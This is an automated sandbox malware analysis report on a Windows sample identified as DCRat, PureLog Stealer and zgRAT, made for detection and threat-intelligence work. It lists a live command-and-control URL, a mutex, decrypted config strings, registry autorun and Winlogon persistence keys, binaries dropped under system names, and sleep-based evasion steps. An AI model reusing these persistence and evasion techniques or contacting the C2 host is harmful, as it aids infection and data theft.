Edit tour

Windows Analysis Report
bridgenet.exe.bin.exe

Overview

General Information

Sample name:	bridgenet.exe.bin.exe
Analysis ID:	1590016
MD5:	13a9fe232c423531f428e7ebf5bcc3ce
SHA1:	7940d3296d943f8f54e6d2e58982812de6f66a79
SHA256:	3e60ac6ac6c4fc9f90b87dde23d1261ac236782de1b00cca97bdf950019ee3a3
Tags:	DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Creates an autostart registry key pointing to binary in C:\Windows

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Drops PE files with benign system names

Drops executable to a common third party application directory

Drops executables to the windows directory (C:\Windows) and starts them

Infects executable files (exe, dll, sys, html)

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: System File Execution Location Anomaly

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

bridgenet.exe.bin.exe (PID: 1432 cmdline: "C:\Users\user\Desktop\bridgenet.exe.bin.exe" MD5: 13A9FE232C423531F428E7EBF5BCC3CE)

csc.exe (PID: 1356 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 3628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 2416 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB99.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCF6FBA02FA6D54D1FBEF275314C5F713F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

csc.exe (PID: 3616 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5z3arsde\5z3arsde.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 5136 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE49.tmp" "c:\Windows\System32\CSCEE8385358E3E4E5C92A1AE5417196AA8.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

cmd.exe (PID: 5136 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\62xZ8bmi7l.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 872 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 3716 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

xvmLxyNtcnPgpmdKoWywaPsdXPf.exe (PID: 3720 cmdline: "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe" MD5: 13A9FE232C423531F428E7EBF5BCC3CE)

cmd.exe (PID: 2148 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xDZppRkgYb.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2416 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 6560 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

xvmLxyNtcnPgpmdKoWywaPsdXPf.exe (PID: 3628 cmdline: "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe" MD5: 13A9FE232C423531F428E7EBF5BCC3CE)

MpCmdRun.exe (PID: 2148 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)

conhost.exe (PID: 2572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

xvmLxyNtcnPgpmdKoWywaPsdXPf.exe (PID: 2036 cmdline: "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe" MD5: 13A9FE232C423531F428E7EBF5BCC3CE)

dwm.exe (PID: 6848 cmdline: "C:\Program Files\Internet Explorer\images\dwm.exe" MD5: 13A9FE232C423531F428E7EBF5BCC3CE)

bridgenet.exe.bin.exe (PID: 3240 cmdline: "C:\Users\user\Desktop\bridgenet.exe.bin.exe" MD5: 13A9FE232C423531F428E7EBF5BCC3CE)

cmd.exe (PID: 2728 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Ye8GjO9RaC.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 4516 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 2832 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

bridgenet.exe.bin.exe (PID: 1876 cmdline: "C:\Users\user\Desktop\bridgenet.exe.bin.exe" MD5: 13A9FE232C423531F428E7EBF5BCC3CE)

cmd.exe (PID: 6856 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\lQjAOk5IUW.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 732 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 1756 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

bridgenet.exe.bin.exe (PID: 4316 cmdline: "C:\Users\user\Desktop\bridgenet.exe.bin.exe" MD5: 13A9FE232C423531F428E7EBF5BCC3CE)

dwm.exe (PID: 2728 cmdline: "C:\Program Files\Internet Explorer\images\dwm.exe" MD5: 13A9FE232C423531F428E7EBF5BCC3CE)

cmd.exe (PID: 712 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\B8RGJU8TMM.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

xvmLxyNtcnPgpmdKoWywaPsdXPf.exe (PID: 4600 cmdline: "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe" MD5: 13A9FE232C423531F428E7EBF5BCC3CE)

cmd.exe (PID: 5592 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\FnlL3aVnrp.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5860 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 6048 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

Conhost.exe (PID: 2616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

xvmLxyNtcnPgpmdKoWywaPsdXPf.exe (PID: 6220 cmdline: "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe" MD5: 13A9FE232C423531F428E7EBF5BCC3CE)

cmd.exe (PID: 5240 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\yC86nPihDu.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 772 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 3628 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

xvmLxyNtcnPgpmdKoWywaPsdXPf.exe (PID: 4944 cmdline: "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe" MD5: 13A9FE232C423531F428E7EBF5BCC3CE)

dwm.exe (PID: 2416 cmdline: "C:\Program Files\Internet Explorer\images\dwm.exe" MD5: 13A9FE232C423531F428E7EBF5BCC3CE)

cmd.exe (PID: 988 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\75OpyD0wFt.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2700 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 5520 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

dwm.exe (PID: 5648 cmdline: "C:\Program Files\Internet Explorer\images\dwm.exe" MD5: 13A9FE232C423531F428E7EBF5BCC3CE)

bridgenet.exe.bin.exe (PID: 5480 cmdline: "C:\Users\user\Desktop\bridgenet.exe.bin.exe" MD5: 13A9FE232C423531F428E7EBF5BCC3CE)

cmd.exe (PID: 5336 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5764 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 4580 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

bridgenet.exe.bin.exe (PID: 6972 cmdline: "C:\Users\user\Desktop\bridgenet.exe.bin.exe" MD5: 13A9FE232C423531F428E7EBF5BCC3CE)

xvmLxyNtcnPgpmdKoWywaPsdXPf.exe (PID: 5576 cmdline: "C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe" MD5: 13A9FE232C423531F428E7EBF5BCC3CE)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://977255cm.nyashkoon.in/secureWindows", "MUTEX": "DCR_MUTEX-8LvN0cHd0DMbHKTinv7o"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
bridgenet.exe.bin.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
bridgenet.exe.bin.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Internet Explorer\images\dwm.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\Internet Explorer\images\dwm.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Internet Explorer\images\dwm.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\Internet Explorer\images\dwm.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1339348052.0000000000AF2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1396182638.0000000013041000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: bridgenet.exe.bin.exe PID: 1432	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe PID: 3720	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: xvmLxyNtcnPgpmdKoWywaPsdXPf.exe PID: 2036	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.bridgenet.exe.bin.exe.af0000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.bridgenet.exe.bin.exe.af0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\bridgenet.exe.bin.exe, ProcessId: 1432, TargetFilename: C:\Program Files\Internet Explorer\images\dwm.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files\Internet Explorer\images\dwm.exe" , CommandLine: "C:\Program Files\Internet Explorer\images\dwm.exe" , CommandLine|base64offset|contains: , Image: C:\Program Files\Internet Explorer\images\dwm.exe, NewProcessName: C:\Program Files\Internet Explorer\images\dwm.exe, OriginalFileName: C:\Program Files\Internet Explorer\images\dwm.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Program Files\Internet Explorer\images\dwm.exe" , ProcessId: 6848, ProcessName: dwm.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\Windows Photo Viewer\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\bridgenet.exe.bin.exe, ProcessId: 1432, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\xvmLxyNtcnPgpmdKoWywaPsdXPf

Sigma detected: CurrentVersion NT Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\Windows Photo Viewer\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\bridgenet.exe.bin.exe, ProcessId: 1432, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\bridgenet.exe.bin.exe", ParentImage: C:\Users\user\Desktop\bridgenet.exe.bin.exe, ParentProcessId: 1432, ParentProcessName: bridgenet.exe.bin.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.cmdline", ProcessId: 1356, ProcessName: csc.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\bridgenet.exe.bin.exe, ProcessId: 1432, TargetFilename: C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.cmdline

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\bridgenet.exe.bin.exe", ParentImage: C:\Users\user\Desktop\bridgenet.exe.bin.exe, ParentProcessId: 1432, ParentProcessName: bridgenet.exe.bin.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xb2ojpgu\xb2ojpgu.cmdline", ProcessId: 1356, ProcessName: csc.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T13:33:16.502249+0100	2048095	1	A Network Trojan was detected	192.168.2.9	49814	104.21.112.1	80	TCP
2025-01-13T13:33:34.408634+0100	2048095	1	A Network Trojan was detected	192.168.2.9	49917	104.21.112.1	80	TCP
2025-01-13T13:33:42.533672+0100	2048095	1	A Network Trojan was detected	192.168.2.9	49962	104.21.112.1	80	TCP
2025-01-13T13:33:47.083680+0100	2048095	1	A Network Trojan was detected	192.168.2.9	49975	104.21.112.1	80	TCP
2025-01-13T13:33:50.533693+0100	2048095	1	A Network Trojan was detected	192.168.2.9	49976	104.21.112.1	80	TCP
2025-01-13T13:33:55.520980+0100	2048095	1	A Network Trojan was detected	192.168.2.9	49978	104.21.112.1	80	TCP
2025-01-13T13:34:00.033812+0100	2048095	1	A Network Trojan was detected	192.168.2.9	49979	104.21.112.1	80	TCP
2025-01-13T13:34:17.222015+0100	2048095	1	A Network Trojan was detected	192.168.2.9	49980	104.21.112.1	80	TCP
2025-01-13T13:34:25.225070+0100	2048095	1	A Network Trojan was detected	192.168.2.9	49981	104.21.112.1	80	TCP
2025-01-13T13:34:49.909081+0100	2048095	1	A Network Trojan was detected	192.168.2.9	49982	104.21.112.1	80	TCP
2025-01-13T13:34:57.971637+0100	2048095	1	A Network Trojan was detected	192.168.2.9	49983	104.21.112.1	80	TCP
2025-01-13T13:35:01.893652+0100	2048095	1	A Network Trojan was detected	192.168.2.9	49984	104.21.112.1	80	TCP
2025-01-13T13:35:05.018538+0100	2048095	1	A Network Trojan was detected	192.168.2.9	49985	104.21.112.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: bridgenet.exe.bin.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://977255cm.nyashkoon.in/secureWindows.php	Avira URL Cloud: Label: malware
Source: http://977255cm.nyashkoon.in/	Avira URL Cloud: Label: malware
Source: http://977255cm.nyashkoon.in	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files\Internet Explorer\images\dwm.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\FnlL3aVnrp.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\fDDEz4CMJh.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\Ye8GjO9RaC.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\75OpyD0wFt.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\62xZ8bmi7l.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\xDZppRkgYb.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\yC86nPihDu.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\B8RGJU8TMM.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\lQjAOk5IUW.bat	Avira: detection malicious, Label: BAT/Delbat.C

Found malware configuration

Source: 00000000.00000002.1396182638.0000000013041000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://977255cm.nyashkoon.in/secureWindows", "MUTEX": "DCR_MUTEX-8LvN0cHd0DMbHKTinv7o"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files\Internet Explorer\images\dwm.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files\Windows Photo Viewer\en-GB\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files\Windows Photo Viewer\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\BazpdGXT.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\LfwFFKlf.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\LwOexCEJ.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\LzBDVIdW.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\NpAnHTXs.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\UOGmotWX.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\ZdtVejrZ.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\ZmWTGheo.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\xQYgnzsS.log	ReversingLabs: Detection: 25%
Source: C:\Windows\apppatch\en-US\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: bridgenet.exe.bin.exe	ReversingLabs: Detection: 73%
Source: bridgenet.exe.bin.exe	Virustotal: Detection: 56%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files\Internet Explorer\images\dwm.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\jDownloader\config\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: bridgenet.exe.bin.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1396182638.0000000013041000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-8LvN0cHd0DMbHKTinv7o","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
Source: 00000000.00000002.1396182638.0000000013041000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://977255cm.nyashkoon.in/","secureWindows"]]

Source: bridgenet.exe.bin.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\bridgenet.exe.bin.exe	Directory created: C:\Program Files\Windows Photo Viewer\en-GB\xvmLxyNtcnPgpmdKoWywaPsdXPf.exe	Jump to behavior
